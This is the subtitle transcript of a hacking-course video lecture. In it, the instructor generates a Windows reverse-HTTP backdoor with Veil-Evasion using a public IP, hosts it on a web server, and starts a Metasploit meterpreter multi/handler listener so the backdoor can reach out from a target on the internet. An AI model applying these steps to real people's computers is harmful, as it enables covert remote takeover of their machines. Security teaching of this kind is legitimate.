1

00:00:00,820  -->  00:00:01,653
<v Educator>Okay,</v>

2

00:00:01,653  -->  00:00:02,486
so now let's go ahead.

3

00:00:02,486  -->  00:00:04,390
Let's create a backdoor,

4

00:00:04,390  -->  00:00:07,860
and the only difference is we're gonna set the IP

5

00:00:07,860  -->  00:00:11,190
to the public IP instead of the local IP,

6

00:00:11,190  -->  00:00:13,290
so we're gonna create a backdoor exactly the same

7

00:00:13,290  -->  00:00:15,400
way that we used to create it when we're hacking

8

00:00:15,400  -->  00:00:17,310
devices in the same network.

9

00:00:17,310  -->  00:00:20,360
So I'm gonna use Veil-Evasion and I'm gonna do

10

00:00:20,360  -->  00:00:22,360
this a bit quickly because we've done it

11

00:00:22,360  -->  00:00:24,500
and there's nothing new with this,

12

00:00:24,500  -->  00:00:26,420
so we can List to see what we have.

13

00:00:27,670  -->  00:00:29,640
I'm gonna use number 9 so it's the exact same

14

00:00:29,640  -->  00:00:31,910
payload that we used in our previous video.

15

00:00:31,910  -->  00:00:34,460
It's the reverse http payload.

16

00:00:34,460  -->  00:00:35,660
So we're gonna use 9,

17

00:00:37,380  -->  00:00:39,190
and we can see the options here.

18

00:00:39,190  -->  00:00:42,160
We can see that the LPORT is set to 8080 by default

19

00:00:42,160  -->  00:00:44,070
and I'm gonna keep that the same.

20

00:00:44,070  -->  00:00:47,020
The only thing that I'm gonna change is the LHOST,

21

00:00:47,020  -->  00:00:49,440
and in the previous videos when we were receiving

22

00:00:49,440  -->  00:00:51,720
connections on our own computer,

23

00:00:52,620  -->  00:00:55,260
we used to set it to the local IP,

24

00:00:55,260  -->  00:00:57,180
so if I do ifconfig wlan0,

25

00:00:58,210  -->  00:01:01,840
we used to set it to 192.168.0.1 because that's

26

00:01:01,840  -->  00:01:05,070
the IP that the devices use inside the network.

27

00:01:05,070  -->  00:01:08,120
Well whenever you want to do things on the outside,

28

00:01:08,120  -->  00:01:11,930
we wanna use the real IP because these internal IPs

29

00:01:11,930  -->  00:01:15,690
are not visible to computers outside the network.

30

00:01:15,690  -->  00:01:17,600
So I'm gonna use the IP that I see on Google,

31

00:01:17,600  -->  00:01:19,630
so when I type in 'what's my ip',

32

00:01:19,630  -->  00:01:22,490
I get this IP and I'm gonna use that as the

33

00:01:22,490  -->  00:01:24,070
LHOST in my backdoor,

34

00:01:24,070  -->  00:01:25,420
so I'm just gonna copy this

35

00:01:27,690  -->  00:01:28,990
and I'm gonna set it here.

36

00:01:33,560  -->  00:01:35,350
And sorry I didn't paste it properly,

37

00:01:35,350  -->  00:01:36,183
so set.

38

00:01:39,730  -->  00:01:42,150
Hit 'info' to make sure everything is set up properly,

39

00:01:42,150  -->  00:01:45,070
so PORT 8080 we're using the public IP,

40

00:01:45,070  -->  00:01:48,040
so this is the most important step in this,

41

00:01:48,040  -->  00:01:49,790
and then we're gonna do 'generate'.

42

00:01:52,970  -->  00:01:55,520
And we're just gonna call this 'backdoordirty.exe'.

43

00:01:57,279  -->  00:01:58,930
You're gonna hit Enter.

44

00:01:58,930  -->  00:02:01,610
And that has generated my payload for me,

45

00:02:01,610  -->  00:02:03,030
so it's stored in here.

46

00:02:04,290  -->  00:02:05,123
So again,

47

00:02:05,123  -->  00:02:06,950
as usual I'm actually gonna copy this

48

00:02:06,950  -->  00:02:08,780
and paste it in my var www html

49

00:02:10,501  -->  00:02:12,380
and I'll show you how to actually even download

50

00:02:12,380  -->  00:02:15,490
this from the internet from outside the network.

51

00:02:15,490  -->  00:02:18,710
So I'm just gonna copy this to my web server directory.

52

00:02:24,830  -->  00:02:25,663
Okay,

53

00:02:25,663  -->  00:02:27,420
so that's all done.

54

00:02:27,420  -->  00:02:30,100
Now all we have to do is just listen for

55

00:02:30,100  -->  00:02:31,640
incoming connections.

56

00:02:31,640  -->  00:02:34,020
We're gonna do that using the multi/handler,

57

00:02:34,020  -->  00:02:35,890
so we've done that before again.

58

00:02:35,890  -->  00:02:37,540
I'm just gonna do it real quick.

59

00:02:37,540  -->  00:02:39,970
And when I'm gonna listen to the multi/handler,

60

00:02:39,970  -->  00:02:42,980
I'm actually gonna listen on my local IP,

61

00:02:42,980  -->  00:02:44,840
so I'm not gonna listen on the external,

62

00:02:44,840  -->  00:02:46,930
I'm gonna listen on the local because I can't

63

00:02:46,930  -->  00:02:48,210
listen on the external.

64

00:02:48,210  -->  00:02:50,170
I'm actually in the network and I only have

65

00:02:50,170  -->  00:02:52,740
control over my current computer.

66

00:02:52,740  -->  00:02:55,150
So what I'm gonna do now is in here,

67

00:02:55,150  -->  00:02:58,550
in the Kali machine I'm gonna listen on PORT 8080,

68

00:02:58,550  -->  00:03:01,760
and in the external device the backdoor will

69

00:03:01,760  -->  00:03:03,500
try to connect to the backdoor,

70

00:03:03,500  -->  00:03:07,770
so the step after that we'll set up IP forwarding

71

00:03:07,770  -->  00:03:11,370
to allow to tell the router to forward PORTs 8080

72

00:03:11,370  -->  00:03:12,720
to the Kali machine,

73

00:03:12,720  -->  00:03:14,560
but first we need to listen on

74

00:03:14,560  -->  00:03:16,500
PORT 8080 in the Kali machine,

75

00:03:16,500  -->  00:03:18,930
and we're gonna do that using the multi/handler.

76

00:03:18,930  -->  00:03:20,600
So I'm just gonna do msfconsole.

77

00:03:22,410  -->  00:03:23,243
Again,

78

00:03:23,243  -->  00:03:25,640
we did this before so I'm gonna do it a little bit quickly.

79

00:03:27,440  -->  00:03:29,500
So I'm gonna 'use exploit/multi/handler'.

80

00:03:32,280  -->  00:03:33,920
I'm gonna set the payload to

81

00:03:33,920  -->  00:03:35,750
windows/meterpreter/reverse_http.

82

00:03:43,370  -->  00:03:46,040
Then we're gonna set the LPORT to 8080,

83

00:03:50,520  -->  00:03:53,560
so that's the port that we're gonna get connections on,

84

00:03:53,560  -->  00:03:55,070
and then I'm gonna set the LHOST,

85

00:03:55,070  -->  00:03:55,903
the listening host,

86

00:03:55,903  -->  00:03:58,070
to my private IP as I said before,

87

00:03:58,070  -->  00:03:58,903
so I'm gonna do

88

00:03:58,903  -->  00:03:59,736
'set LHOST

89

00:04:01,220  -->  00:04:03,670
to 192.168.0.11'.

90

00:04:06,560  -->  00:04:08,150
Now I'm gonna do 'show options' to make sure

91

00:04:08,150  -->  00:04:09,550
everything is done properly,

92

00:04:11,070  -->  00:04:14,800
and we can see that we have the LPORT is set to 8080

93

00:04:14,800  -->  00:04:18,980
and the local host is set to 192.168.0.11

94

00:04:18,980  -->  00:04:21,370
and we're using a payload of

95

00:04:21,370  -->  00:04:23,520
windows/meterpreter/reverse_http.

96

00:04:24,640  -->  00:04:25,590
So it's all good.

97

00:04:25,590  -->  00:04:26,740
I'm gonna do 'exploit'.

98

00:04:29,200  -->  00:04:30,640
As you can see here,

99

00:04:30,640  -->  00:04:33,080
it's listening on my private IP

100

00:04:33,080  -->  00:04:35,650
and it's listening on PORT 8080.

101

00:04:35,650  -->  00:04:37,560
So now we did the two main steps:

102

00:04:37,560  -->  00:04:39,010
we created a backdoor,

103

00:04:39,010  -->  00:04:41,890
and the backdoor will give us connections back

104

00:04:41,890  -->  00:04:44,210
based on the real IP address,

105

00:04:44,210  -->  00:04:47,170
and we're listening on our local machine.

106

00:04:47,170  -->  00:04:50,080
We're listening on PORT 8080 in the Kali machine.

107

00:04:50,080  -->  00:04:51,770
So when the target person runs the backdoor

108

00:04:51,770  -->  00:04:54,100
on the internet they're gonna get,

109

00:04:54,100  -->  00:04:55,570
the backdoor will try to connect

110

00:04:55,570  -->  00:04:58,330
to this IP on PORT 8080.

111

00:04:58,330  -->  00:05:00,810
The only problem now is the Gateway,

112

00:05:00,810  -->  00:05:02,940
which is the router right here.

113

00:05:02,940  -->  00:05:05,140
It doesn't have PORT 8080 open,

114

00:05:05,140  -->  00:05:06,770
so it's gonna receive the connection.

115

00:05:06,770  -->  00:05:08,820
It's not gonna know what to do with it,

116

00:05:08,820  -->  00:05:10,250
so we actually need to configure

117

00:05:10,250  -->  00:05:12,430
the router to tell it whenever you get something,

118

00:05:12,430  -->  00:05:15,470
whenever you get a connection on PORT 8080,

119

00:05:15,470  -->  00:05:18,030
I want you to redirect it to my Kali machine.

120

00:05:19,270  -->  00:05:20,900
And we can do that in two ways,

121

00:05:20,900  -->  00:05:23,630
and we're gonna talk about them in the next lecture.
